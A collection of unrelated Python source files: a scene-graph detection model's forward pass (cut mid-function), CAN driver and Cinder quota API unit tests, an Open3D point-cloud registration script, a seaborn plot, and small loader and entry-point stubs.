#print('result.gt_adj_mat_graph', result.gt_adj_mat_graph)
if self.mode != 'sgdet':
gt_mul_label_num = gt_mul_label_num
result.gt_mul_label = gt_mul_label
result.gt_mul_rel = gt_mul_rel
else :
gt_mul_label_num = result.gt_multi_label_num
result.gt_mul_label = result.gt_mul_label
result.gt_mul_rel = result.gt_mul_rel
if self.mode != 'predcls_nongtbox':
rel_inds_graph, rel_inds_offset_graph = self.get_rel_inds(result.rel_labels_graph, result.rel_labels_offset_graph, im_inds, boxes)
rel_inds_rel, rel_inds_offset_rel = self.get_rel_inds(result.rel_labels_rel, result.rel_labels_offset_rel, im_inds, boxes)
#rel_inds: shape [num_rels, 3], each array is [img_ind, box_ind1, box_ind2] for training
rois = torch.cat((im_inds[:, None].float(), boxes), 1)
result.obj_fmap = self.obj_feature_map(result.fmap.detach(), rois)
# Prevent gradients from flowing back into score_fc from elsewhere
if (self.training or self.mode == 'predcls') and self.mode != 'predcls_nongtbox':
obj_labels = result.rm_obj_labels
elif self.mode == 'predcls_nongtbox':
rois, obj_labels, _, _, _, rel_labels = self.detector.gt_boxes(None, im_sizes, image_offset, gt_boxes,
gt_classes, gt_rels, train_anchor_inds, proposals=proposals)
im_inds = rois[:, 0].long().contiguous()
gt_boxes = rois[:, 1:]
rel_inds = self.get_rel_inds(rel_labels, im_inds, gt_boxes)
result.rel_labels = rel_labels
result.rm_obj_labels = obj_labels
else :
obj_labels = None
vr_graph = self.visual_rep(result.fmap.detach(), rois, rel_inds_graph[:, 1:], type='graph')
vr_rel = self.visual_rep(result.fmap.detach(), rois, rel_inds_rel[:, 1:], type='rel')
if result.rel_labels_graph is None or ( not self.training ):
rel_label = None
else:
rel_label = result.rel_labels_graph[:,-1]
''' '''
if result.gt_adj_mat_graph is not None:
gt_adj_mat = result.gt_adj_mat_graph[rel_inds_graph[:, 1], \
rel_inds_offset_graph[:, 2]].type(torch.cuda.LongTensor).type_as(result.fmap.data)
else:
gt_adj_mat = None
result.rm_obj_dists, result.obj_preds_nozeros, result.obj_preds_zeros, edge_ctx, edge_sub_ctx, edge_obj_ctx, obj_feat_att, obj_feat_att_w, \
adj_mat_rel, adj_mat_obj, keep_union, rel_inds_nms, rel_dists, result.mul_dist = self.context(
obj_fmaps = result.obj_fmap,
obj_logits = result.rm_obj_dists.detach(),
im_inds = im_inds,
obj_labels = obj_labels,
box_priors = boxes.data,
boxes_per_cls = result.boxes_all,
obj_feat_im_inds = obj_feat_im_inds,
f_map = result.fmap,
union_feat=vr_graph, rel_inds=rel_inds_graph.clone(), rel_inds_offset=rel_inds_offset_graph,
gt_adj_mat=gt_adj_mat,
rel_label=rel_label,
label_prior=result.obj_preds,
num_box=num_box,
)
result.att_alpha = obj_feat_att_w
result.im_inds = im_inds
result.obj_feat_im_inds = obj_feat_im_inds
result.pre_adj_mat_rel = adj_mat_rel
result.pre_adj_mat_obj = adj_mat_obj
result.keep_union = keep_union
if self.mode == 'detclass' :
if self.training:
return result
else:
rm_obj_softmax = F.softmax(result.rm_obj_dists, dim=-1)
obj_preds = rm_obj_softmax[:, 1:].max(-1)[1] + 1
twod_inds = arange(obj_preds.data) * self.num_classes + obj_preds.data
obj_scores = F.softmax(result.rm_obj_dists, dim=-1)
obj_scores = obj_scores.cpu().data.numpy()
obj_preds = obj_preds.cpu().data.numpy()
rm_box_priors = result.rm_box_priors.cpu().data.numpy()
return rm_box_priors, obj_preds, obj_scores
if self.edge_ctx_type != 'union':
if edge_ctx is None:
edge_rep = self.post_emb(result.obj_preds)
else:
subj_rep = self.post_sub_lstm(edge_sub_ctx)
obj_rep = self.post_obj_lstm(edge_obj_ctx)
# Split into subject and object representations
#edge_rep = edge_rep.view(edge_rep.size(0), 2, self.pooling_dim)
subj_rep = F.dropout(subj_rep, self.dropout_rate, training=self.training)
obj_rep = F.dropout(obj_rep, self.dropout_rate, training=self.training)
#subj_rep = edge_rep[:, 0]
#obj_rep = edge_rep[:, 1]
obj_rel_ind = rel_inds_rel
vr_obj = vr_rel
subj_rep_rel = subj_rep[obj_rel_ind[:, 1]]
obj_rep_rel = obj_rep[obj_rel_ind[:, 2]]
#prod_rep = subj_rep[obj_rel_ind[:, 1]] * obj_rep[obj_rel_ind[:, 2]]
if self.use_vision:
if self.mode != 'predcls_nongtbox':
vr_obj = vr_obj
else :
vr_obj = 0.5 * (obj_feat_att[obj_rel_ind[:, 1]] + obj_feat_att[obj_rel_ind[:, 2]])
if self.limit_vision:
# exact value TBD
subj_rep_rel = torch.cat((subj_rep_rel[:,:2048] * subj_rep_rel[:,:2048], subj_rep_rel[:,2048:]), 1)
obj_rep_rel = torch.cat((obj_rep_rel[:, :2048] * obj_rep_rel[:, :2048], obj_rep_rel[:, 2048:]), 1)
else:
subj_rep_rel = subj_rep_rel * vr_obj[:,:self.pooling_dim]
obj_rep_rel = obj_rep_rel * vr_obj[:,:self.pooling_dim]
if self.use_tanh:
subj_rep_rel = F.tanh(subj_rep_rel)
obj_rep_rel = F.tanh(obj_rep_rel)
if self.with_biliner_score:
result.rel_dists = self.bilinear_score(subj_rep_rel, obj_rep_rel)
else:
prod_rep = subj_rep_rel * obj_rep_rel
result.rel_dists = self.rel_compress(prod_rep)
elif self.edge_ctx_type == 'union':
obj_rel_ind = rel_inds_nms
result.rel_dists = rel_dists
rel_inds_rel = rel_inds_nms
result.rel_labels_rel = result.rel_labels_graph
if keep_union is not None:
result.rel_labels_rel = result.rel_labels_graph[keep_union]
if self.use_bias and self.edge_ctx_type != 'union':
if self.mode != 'sgdet':
rel_obj_preds = result.obj_preds_nozeros.clone()
else:
rel_obj_preds = result.obj_preds_nozeros.clone()
'''
if self.training:
rel_obj_preds = result.rm_obj_labels.clone()
else:
rel_obj_preds = result.rm_obj_dists.max(1)[1]
'''
if self.with_adaptive:
sen_vis_score = self.adp_bilinear_score(subj_rep_rel * obj_rep_rel,
vr_obj[:, :self.pooling_dim])
result.rel_dists = sen_vis_score[:, 0, None] * result.rel_dists \
+ sen_vis_score[:, 1, None] * \
self.freq_bias.index_with_labels(torch.stack((
rel_obj_preds[obj_rel_ind[:, 1]],
rel_obj_preds[obj_rel_ind[:, 2]],
), 1))
else:
freq_bias_so = self.freq_bias.index_with_labels(torch.stack((
rel_obj_preds[obj_rel_ind[:, 1]],
rel_obj_preds[obj_rel_ind[:, 2]],
), 1))
result.rel_dists = result.rel_dists + freq_bias_so
if self.training:
if self.with_cosine_dis:
self.obj_glove_vec = self.obj_glove_vec.contiguous().cuda(obj_rel_ind.get_device(),async=True)
self.rel_glove_vec = self.rel_glove_vec.contiguous().cuda(obj_rel_ind.get_device(), async=True)
fg_ind = result.num_true_rel.data
obj_label_1 = result.rm_obj_labels[obj_rel_ind[fg_ind][:, 1]].data
obj_label_2 = result.rm_obj_labels[obj_rel_ind[fg_ind][:, 2]].data
rel_label = result.rel_labels_rel[fg_ind][:, -1].data
sub_glove_vec = self.obj_glove_vec[obj_label_1]
obj_glove_vec = self.obj_glove_vec[obj_label_2]
rel_glove_vec = self.rel_glove_vec[rel_label]
all_glove_vec = torch.cat([sub_glove_vec, rel_glove_vec, obj_glove_vec], -1)
all_rel_num = all_glove_vec.shape[0]
all_rel_ind = np.arange(all_rel_num)
all_rel_mat = np.ones([all_rel_num,all_rel_num])
all_rel_mat[all_rel_ind,all_rel_ind] = 0.
all_rel_ind_1, all_rel_ind_2 = all_rel_mat.nonzero()
all_rel_ind_1 = torch.LongTensor(all_rel_ind_1).contiguous().cuda(obj_rel_ind.get_device(),async=True)
all_rel_ind_2 = torch.LongTensor(all_rel_ind_2).contiguous().cuda(obj_rel_ind.get_device(), async=True)
all_glove_cosine_dis = F.cosine_similarity(all_glove_vec[all_rel_ind_1], all_glove_vec[all_rel_ind_2])
all_rep = (subj_rep_rel * obj_rep_rel)[fg_ind]
all_rep_cosine_dis = F.cosine_similarity(all_rep[all_rel_ind_1], all_rep[all_rel_ind_2])
result.all_rep_glove_rate = all_rep_cosine_dis / ( Variable(all_glove_cosine_dis) + 1e-8 )
return result
twod_inds = arange(result.obj_preds_nozeros.data) * self.num_classes + result.obj_preds_nozeros.data
result.obj_scores = F.softmax(result.rm_obj_dists, dim=1).view(-1)[twod_inds]
result.pre_adj_mat_rel = F.softmax(result.pre_adj_mat_rel, dim=-1)
result.pre_adj_mat_obj = F.softmax(result.pre_adj_mat_obj, dim=-1)
# Bbox regression
if self.mode == 'sgdet':
bboxes = result.boxes_all.view(-1, 4)[twod_inds].view(result.boxes_all.size(0), 4)
elif self.mode == 'predcls_nongtbox':
bboxes = gt_boxes
else:
# Boxes will get fixed by filter_dets function.
bboxes = result.rm_box_priors
rel_rep = F.softmax(result.rel_dists, dim=1)
return filter_dets(ids, im_inds, bboxes, result.obj_scores,
result.obj_preds_nozeros, result.pre_adj_mat_rel[:,1],
result.pre_adj_mat_obj[:,1] if result.pre_adj_mat_obj is not None else None,
rel_inds_rel[:, 1:],
rel_rep,
nongt_box=self.mode=='predcls_nongtbox', with_adj_mat = self.with_adj_mat,
with_gt_adj_mat=self.with_gt_adj_mat, gt_adj_mat=gt_adj_mat,
alpha=self.test_alpha, feat=subj_rep_rel*obj_rep_rel,
ext_feat=self.ext_feat,
mode=self.mode)
def __getitem__(self, batch):
""" Hack to do multi-GPU training"""
batch.scatter()
if self.num_gpus == 1:
return self(*batch[0])
replicas = nn.parallel.replicate(self, devices=list(range(self.num_gpus)))
outputs = nn.parallel.parallel_apply(replicas, [batch[i] for i in range(self.num_gpus)])
if self.training:
return gather_res(outputs, 0, dim=0)
return outputs
|
py | 7dfa802f662ed83dd9c8b7aae7c97382486f94c7 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 The pycan developers. All rights reserved.
# Project site: https://github.com/questrail/pycan
# Use of this source code is governed by a MIT-style license that
# can be found in the LICENSE.txt file for the project.
import os
import unittest
from pycan.basedriver import *
from pycan.common import CANMessage
def measure_performance(driver, rate, run_time=3.0):
expected_counts = run_time / rate
tic = time.time()
t_stats = []
obc = 0
while driver.total_outbound_count < expected_counts:
if obc != driver.total_outbound_count:
toc = time.time()
t_stats.append(toc - tic)
tic = toc
obc = driver.total_outbound_count
ret = (max(t_stats)*1000.0, min(t_stats)*1000.0, (sum(t_stats) / float(len(t_stats))) * 1000.0)
print "\nTarget:%1.1f (ms)\nMax %1.1f\nMin %1.1f\nAvg %1.1f" % (rate*1000.0, ret[0], ret[1], ret[2])
return ret
class CANDriverTests(unittest.TestCase):
def setUp(self):
self.driver = None
def tearDown(self):
try:
self.driver.shutdown()
time.sleep(1)
except:
pass
def testPEP8Compliance(self):
# Ensure PEP8 is installed
try:
import pep8
except ImportError:
self.fail(msg="PEP8 not installed.")
# Check the CAN driver
basedriver = os.path.abspath('pycan/basedriver.py')
pep8_checker = pep8.Checker(basedriver)
violation_count = pep8_checker.check_all()
error_message = "PEP8 violations found: %d" % (violation_count)
self.assertTrue(violation_count == 0, msg = error_message)
def testAddReceiveHandler(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
def test_handler(message):
pass
self.assertTrue(self.driver.add_receive_handler(test_handler),
msg="Unable to add a generic handler")
can_id = 0x12345
self.assertTrue(self.driver.add_receive_handler(test_handler, can_id),
msg="Unable to add an ID specific handler")
can_id_2 = 0x123456
self.assertTrue(self.driver.add_receive_handler(test_handler, can_id_2),
msg="Unable to add multiple specific handlers")
def testMessageQueues(self):
self.driver = BaseDriver(max_in=2, max_out=2, loopback=False)
msg1 = CANMessage(0x123, [1,2])
msg2 = CANMessage(0x1234, [1,2,3])
self.assertTrue(self.driver.send(msg1))
self.assertTrue(self.driver.send(msg2))
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_outbound_count == 2, msg="Message not added to outbound queue")
self.assertTrue(self.driver.total_inbound_count == 0, msg="Loopback placed a message in the queue" )
self.assertFalse(self.driver.send(msg1), msg="Max outbound queue size not honored")
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_outbound_count == 2, msg="Max outbound queue size not honored")
self.assertTrue(self.driver.total_inbound_count == 0, msg="Loopback placed a message in the queue" )
def testMessageLoopback(self):
self.driver = BaseDriver(max_in=5, max_out=2, loopback=True)
msg1 = CANMessage(0x123, [1,2])
msg2 = CANMessage(0x1234, [1,2,3])
self.assertTrue(self.driver.send(msg1))
self.assertTrue(self.driver.send(msg2))
self.assertTrue(self.driver.total_outbound_count == 2,
msg="Message not added to outbound queue")
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_inbound_count == 2,
msg="Loopback didn't add message to inbound: %d" %self.driver.total_inbound_count )
self.assertFalse(self.driver.send(msg1))
self.assertTrue(self.driver.total_outbound_count == 2,
msg="Max outbound queue size not honored")
time.sleep(.5) # Allow time for the queue to be processed
self.assertTrue(self.driver.total_inbound_count == 2,
msg="Loopback still placed the message in the outbound: %d" % self.driver.total_inbound_count)
def testReceiveHandlers(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
msg1 = CANMessage(0x123, [1,2])
msg2 = CANMessage(0x1234, [1,2,3])
msg3 = CANMessage(0x12345, [1,2,3,4])
spec_event1 = threading.Event()
spec_event1.clear()
spec_event2 = threading.Event()
spec_event2.clear()
spec_event3 = threading.Event()
spec_event3.clear()
gen_event1 = threading.Event()
gen_event1.clear()
gen_event2 = threading.Event()
gen_event2.clear()
gen_event3 = threading.Event()
gen_event3.clear()
def msg1_handler(message):
if msg1 is message:
spec_event1.set()
def msg2_handler(message):
if msg2 is message:
spec_event2.set()
def msg3_handler(message):
if msg3 is message:
spec_event3.set()
def gen_handler(message):
if msg1 is message:
gen_event1.set()
if msg2 is message:
gen_event2.set()
if msg3 is message:
gen_event3.set()
# Add the handlers
self.driver.add_receive_handler(msg1_handler, msg1.id)
self.driver.add_receive_handler(msg2_handler, msg2.id)
self.driver.add_receive_handler(msg3_handler, msg3.id)
self.driver.add_receive_handler(gen_handler)
# Force messages in the inbound queue
self.driver.inbound.put(msg1)
self.driver.inbound.put(msg2)
self.driver.inbound.put(msg3)
# Allow some time for the messages to be processed
time.sleep(1)
# Check the specific handlers
self.assertTrue(spec_event1.isSet(), msg="Message 1 specific handler failed")
self.assertTrue(spec_event2.isSet(), msg="Message 2 specific handler failed")
self.assertTrue(spec_event3.isSet(), msg="Message 3 specific handler failed")
# Check the generic handler
self.assertTrue(gen_event1.isSet(), msg="Message 1 generic handler failed")
self.assertTrue(gen_event2.isSet(), msg="Message 2 generic handler failed")
self.assertTrue(gen_event3.isSet(), msg="Message 3 generic handler failed")
def testCyclicPerformance_1000ms(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
self.__performance_test(self.driver, 1, 5.0, [1.75, 1.00, 1.5])
def testCyclicPerformance_100ms(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
self.__performance_test(self.driver, .1, 5.0, [1.00, .1, .175])
def testCyclicPerformance_10ms(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
self.__performance_test(self.driver, .01, 5.0, [.5, .01, .075])
def testCyclicAdd(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=False)
msg1 = CANMessage(1, [1])
msg2 = CANMessage(2, [1,2])
# Add and start some cyclic messages
self.assertTrue(self.driver.add_cyclic_message(msg1, .1), msg="Unable to add cyclic message")
self.assertTrue(self.driver.add_cyclic_message(msg2, .1, "ETC2"), msg="Unable to add cyclic message")
time.sleep(1) # allow time for the cyclic messages to send
qsize = self.driver.total_outbound_count
self.assertTrue(qsize > 10, msg="Q Size: %d" % qsize)
self.assertTrue(self.driver.stop_cyclic_message(msg1.id), msg="Unable to stop cyclic message")
self.assertTrue(self.driver.stop_cyclic_message("ETC2"), msg="Unable to stop cyclic message")
def testCyclicOperation(self):
self.driver = BaseDriver(max_in=500, max_out=500, loopback=True)
msg1_evt = threading.Event()
msg1_evt.clear()
msg2_evt = threading.Event()
msg2_evt.clear()
msg3_evt = threading.Event()
msg3_evt.clear()
msg1 = CANMessage(1, [1])
msg2 = CANMessage(2, [1,2])
msg3 = CANMessage(2, [3,4])
def msg1_handler(message):
if msg1 is message:
msg1_evt.set()
def msg2_handler(message):
if msg2 is message:
msg2_evt.set()
elif msg3 is message:
msg3_evt.set()
# Add the message handlers
self.driver.add_receive_handler(msg1_handler, msg1.id)
self.driver.add_receive_handler(msg2_handler, msg2.id)
# Add and start some cyclic messages
self.assertTrue(self.driver.add_cyclic_message(msg1, .1, "Message 1"), msg="Unable to add cyclic message")
self.assertTrue(self.driver.add_cyclic_message(msg2, .1, "Message 2"), msg="Unable to add cyclic message")
# Wait for the cyclic messages to send
msg1_evt.wait(5.0)
msg2_evt.wait(5.0)
# Update message 2 payload
self.assertTrue(self.driver.update_cyclic_message(msg3, "Message 2"), msg="Unable to update cyclic message")
# Wait for the cyclic messages to send
msg3_evt.wait(5.0)
# Ensure messages were sent out
self.assertTrue(msg1_evt.isSet(), msg="Message 1 not received")
self.assertTrue(msg2_evt.isSet(), msg="Message 2 not received")
self.assertTrue(msg3_evt.isSet(), msg="Message 2 not updated")
self.assertTrue(self.driver.stop_cyclic_message("Message 1"), msg="Unable to stop cyclic message")
self.assertTrue(self.driver.stop_cyclic_message("Message 2"), msg="Unable to stop cyclic message")
def __performance_test(self, driver, rate, run_time, tolerances):
# Determine the upper and lower bounds based on the tolerance in seconds
uTarget, lTarget, aTarget = tolerances
# Scale the seconds to miliseconds
uTarget *= 1000.0
lTarget *= 1000.0
aTarget *= 1000.0
msg1 = CANMessage(1, [1])
# Add and start some cyclic messages
self.assertTrue(self.driver.add_cyclic_message(msg1, rate), msg="Unable to add cyclic message")
max_t, min_t, avg_t = measure_performance(driver, rate, run_time)
self.assertTrue(lTarget < avg_t < uTarget, msg="Avg time (%1.1f) expected to be between %1.1f and %1.1f" % (avg_t, uTarget, lTarget))
self.assertTrue(max_t < uTarget, msg="Max time (%1.1f) expected to be less than %1.1f" % (max_t, uTarget))
self.assertTrue(min_t > lTarget, msg="Min time (%1.1f) expected to be greater than %1.1f" % (min_t, lTarget))
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(CANDriverTests)
unittest.TextTestRunner(verbosity=2).run(suite)
|
py | 7dfa80902641e0a22fee85a95495e7ebe8c72c29 |
import sys, os
import numpy as np
import math
sys.path.insert (0, '/home/tensor/aa_dpe_emulate/include/')
sys.path.insert (0, '/home/tensor/aa_dpe_emulate/src/')
from data_convert import *
from instrn_proto import *
from tile_instrn_proto import *
dict_temp = {}
dict_list = []
i_temp = i_hlt()
dict_list.append(i_temp.copy())
filename = 'large/tile0/core_imem0.npy'
np.save(filename, dict_list)
|
py | 7dfa8215988340378de3656f65a07009b3c33fb3 | import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
fmri = sns.load_dataset("fmri")
sns.set()
mpl.rcParams['font.family'] = "monospace"
mpl.rcParams['text.color'] = "C1C1CD"
mpl.rcParams['patch.linewidth'] = 0.
mpl.rcParams['axes.facecolor'] = "F5F8F8"
mpl.rcParams['axes.edgecolor'] = "C1C1CD"
mpl.rcParams['xtick.color'] = "C1C1CD"
mpl.rcParams['ytick.color'] = "C1C1CD"
mpl.rcParams['grid.color'] = "E5E7EB"
sns.relplot(x="timepoint", y="signal", kind="line", data=fmri)
plt.show()
|
py | 7dfa8220351481d4300066accf0de43cf85aba72 | import open3d as o3d
import numpy as np
def load_point_clouds(voxel_size=0.0):
pcds = []
_list = [49, 99]
for i in _list:
#pcd = o3d.io.read_point_cloud("../../test_data/ICP/cloud_bin_%d.pcd" %i)
#pcd = o3d.io.read_point_cloud("../panda/frames/000%d.jpg" %i)
color_raw = o3d.io.read_image("../panda/frames/color/000%d.jpg" %(i))
depth_raw = o3d.io.read_image("../panda/frames/depth/000%d.png" %(i))
rgbd_image = o3d.geometry.RGBDImage.create_from_color_and_depth(color_raw, depth_raw)
pcd = o3d.geometry.PointCloud.create_from_rgbd_image(rgbd_image, o3d.camera.PinholeCameraIntrinsic(o3d.camera.PinholeCameraIntrinsicParameters.PrimeSenseDefault))
pcd_down = pcd.voxel_down_sample(voxel_size=voxel_size)
pcd_down.estimate_normals(search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))
pcds.append(pcd_down)
return pcds
voxel_size = 0.002
pcds_down = load_point_clouds(voxel_size)
"""
o3d.visualization.draw_geometries(pcds_down,
zoom=0.3412,
front=[0.4257, -0.2125, -0.8795],
lookat=[2.6172, 2.0475, 1.532],
up=[-0.0694, -0.9768, 0.2024])
"""
def pairwise_registration(source, target):
print("Apply point-to-plane ICP")
icp_coarse = o3d.pipelines.registration.registration_icp(
source, target, max_correspondence_distance_coarse, np.identity(4),
o3d.pipelines.registration.TransformationEstimationPointToPlane())
icp_fine = o3d.pipelines.registration.registration_icp(
source, target, max_correspondence_distance_fine,
icp_coarse.transformation,
o3d.pipelines.registration.TransformationEstimationPointToPlane())
transformation_icp = icp_fine.transformation
information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(
source, target, max_correspondence_distance_fine,
icp_fine.transformation)
return transformation_icp, information_icp
def full_registration(pcds, max_correspondence_distance_coarse,
max_correspondence_distance_fine):
pose_graph = o3d.pipelines.registration.PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))
n_pcds = len(pcds)
# 这个地方逐一比较 没有并行度 速度极其缓慢
for source_id in range(n_pcds):
for target_id in range(source_id + 1, n_pcds):
transformation_icp, information_icp = pairwise_registration(
pcds[source_id], pcds[target_id])
print("Build o3d.pipelines.registration.PoseGraph")
if target_id == source_id + 1: # odometry case
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(
o3d.pipelines.registration.PoseGraphNode(
np.linalg.inv(odometry)))
pose_graph.edges.append(
o3d.pipelines.registration.PoseGraphEdge(source_id,
target_id,
transformation_icp,
information_icp,
uncertain=False))
else: # loop closure case
pose_graph.edges.append(
o3d.pipelines.registration.PoseGraphEdge(source_id,
target_id,
transformation_icp,
information_icp,
uncertain=True))
return pose_graph
print("Full registration ...")
max_correspondence_distance_coarse = voxel_size * 15
max_correspondence_distance_fine = voxel_size * 1.5
with o3d.utility.VerbosityContextManager(
o3d.utility.VerbosityLevel.Debug) as cm:
pose_graph = full_registration(pcds_down,
max_correspondence_distance_coarse,
max_correspondence_distance_fine)
print("Optimizing PoseGraph ...")
option = o3d.pipelines.registration.GlobalOptimizationOption(
max_correspondence_distance=max_correspondence_distance_fine,
edge_prune_threshold=0.25,
reference_node=0)
with o3d.utility.VerbosityContextManager(
o3d.utility.VerbosityLevel.Debug) as cm:
o3d.pipelines.registration.global_optimization(
pose_graph,
o3d.pipelines.registration.GlobalOptimizationLevenbergMarquardt(),
o3d.pipelines.registration.GlobalOptimizationConvergenceCriteria(),
option)
print("Transform points and display")
for point_id in range(len(pcds_down)):
print(pose_graph.nodes[point_id].pose)
pcds_down[point_id].transform(pose_graph.nodes[point_id].pose)
o3d.visualization.draw_geometries(pcds_down,
zoom=0.3412,
front=[0.4257, -0.2125, -0.8795],
lookat=[2.6172, 2.0475, 1.532],
up=[-0.0694, -0.9768, 0.2024])
|
py | 7dfa84028501824d0cabc87a273c86db794aae54 | import random
import requests
import json
from creds import *
def test_fail_if_no_tenant():
_headers = headers()
r = requests.post(
CINDER_URL + 'os-quota-sets',
headers=_headers)
assert 404 == r.status_code
def test_fail_without_ADMIN_TENANT():
_headers = headers()
r = requests.get(
CINDER_URL + 'os-quota-sets/%s' % DEMO_TENANT,
headers=_headers)
assert 404 == r.status_code, r.text
def test_show_quotas_for_user():
_headers = headers()
value1 = 50
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"volumes": value1
}},
headers=_headers)
assert 200 == r.status_code
value2 = 100
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"user_id": 1,
"volumes": value2
}},
headers=_headers)
# put request for user is failed due user_id
assert 400 == r.status_code, r.text
assert 'Bad key' in r.json()['badRequest']['message']
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert value1 == r.json()['quota_set']['volumes']
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers, params={'user_id': 1})
# get request with user_id just returns quotas for tenant
assert value1 == r.json()['quota_set']['volumes']
def test_show_details():
_headers = headers()
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s/detail' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 404 == r.status_code, r.text
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code, r.text
default = r
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers, params={'usage': True})
assert 200 == r.status_code, r.text
for i in r.json()['quota_set']:
if i == 'id':
assert default.json()['quota_set'][i] == r.json()['quota_set'][i]
continue
assert default.json()['quota_set'][i] == r.json()['quota_set'][i]['limit']
def test_set_quota_for_tenant():
value = random.randint(1, 100)
_headers = headers()
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"volumes": value
}},
headers=_headers)
assert 200 == r.status_code, r.text
assert value == r.json()['quota_set']['volumes']
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code
assert value == r.json()['quota_set']['volumes']
def test_fail_on_unknown_quota():
_headers = headers()
r = requests.put(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
json={
"quota_set": {
"volumes101": 10
}},
headers=_headers)
assert 400 == r.status_code, r.text
assert 'Bad key' in r.json()['badRequest']['message']
def test_show_defaults():
_headers = headers()
r = requests.get(
CINDER_URL + '%s/os-quota-sets/defaults' % (ADMIN_TENANT,),
headers=_headers)
assert 200 == r.status_code, r.text
assert 'volumes' in r.json()['quota_set']
print r.json()
def test_delete():
_headers = headers()
r = requests.delete(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code, r.text
value = 10 # default values for volumes
r = requests.get(
CINDER_URL + '%s/os-quota-sets/%s' % (ADMIN_TENANT, DEMO_TENANT),
headers=_headers)
assert 200 == r.status_code, r.text
assert value == r.json()['quota_set']['volumes']
|
py | 7dfa851704df615c601007099d9088c094e1cfff | """
This file offers the methods to automatically retrieve the graph Nannizzia gypsea CBS 118893.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def NannizziaGypseaCbs118893(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Nannizzia gypsea CBS 118893 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Nannizzia gypsea CBS 118893 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="NannizziaGypseaCbs118893",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
py | 7dfa85d8ac6adf3e8a95272a49549d0967a16b08 | import os
from app import create_app
env = os.environ.get('APPNAME_ENV', 'dev')
application = create_app('app.settings.%sConfig' % env.capitalize())
if __name__ == "__main__":
application.run() |
py | 7dfa86db6b1d0d378d67b4353d991432d8a91557 | #
# Collective Knowledge (individual environment - setup)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, [email protected], http://fursin.net
#
import os
##############################################################################
